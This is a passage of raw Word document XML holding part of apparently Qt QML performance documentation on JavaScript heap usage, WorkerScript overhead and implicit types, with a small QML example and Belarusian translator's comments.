          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>any data which is allocated specifically by QML imports (libraries)</w:t>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F83200" w:rsidRPr="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00F83200" w:rsidRPr="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>зразумець гэты пункт больш тонка</w:t>
      </w:r>
      <w:r w:rsidR="00F83200" w:rsidRPr="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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The </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript heap will contain:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the fixed and unavoidable overhead of the JavaScript engine itself</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (including built-in JavaScript types)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the fixed and unavoidable overhead of our JavaScript integration</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (constructor functions for loaded types, function templates, and so on)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>per-type layout information and other internal type-data generated by the JavaScript engine at runtime, for each type</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see note below, regarding types)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>per-object JavaScript data</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ("var" properties, JavaScript functions and signal handlers, and non-optimized binding expressions)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="007C1341" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>variables allocated during expression evaluation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00F83200" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>there will be one JavaScript heap allocated for use in the main thread, and optionally one other JavaScript heap allocated for use in the</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId671" w:history="1">
        <w:r w:rsidRPr="007C1341">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>WorkerScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thread</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If an application does not use a</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId672" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>WorkerScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">element, that overhead will not be incurred. The </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript heap can be several megabytes in size, and so applications written for memory-constrained devices may be best served to avoid using the</w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId673" w:history="1">
        <w:r w:rsidRPr="007C1341">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>WorkerScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>element despite its usefulness in populating list models asynchronously</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F83200" w:rsidRPr="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">кантэкст выкарыстання </w:t>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WorkerScript</w:t>
      </w:r>
      <w:r w:rsidR="00F83200" w:rsidRPr="00F83200">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00464C58" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note that both the QML engine and the JavaScript engine will automatically generate their own caches of type-data about observed types</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Every component loaded by an application is a distinct (explicit) type, and every element (component instance) which defines its own custom properties in QML is an implicit type. Any element (instance of a component) which does not define any custom properties is considered by the JavaScript and QML engines to be of the type explicitly defined by the component, rather than its own implicit type.</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Consider the following </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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QtQuick</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2.3</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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root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lastRenderedPageBreak/>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color</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"red"</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r1</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color</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"blue"</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width</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50</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r2</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property</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> customProperty</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</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r3</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property</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string</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> customProperty</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"hello"</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w: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id</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r4</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property</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> customProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"hello"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="005D1E3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D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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In the previous example, the rectangles</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r0</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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r1</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>do not have any custom properties, and thus the JavaScript and QML engines consider them both to be of the same type. That is,</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r0</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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r1</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">are both considered to be of the </w:t>
      </w:r>
      <w:r w:rsidRPr="007C1341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>explicitly</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> defined</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Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type. The rectangles</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r2</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
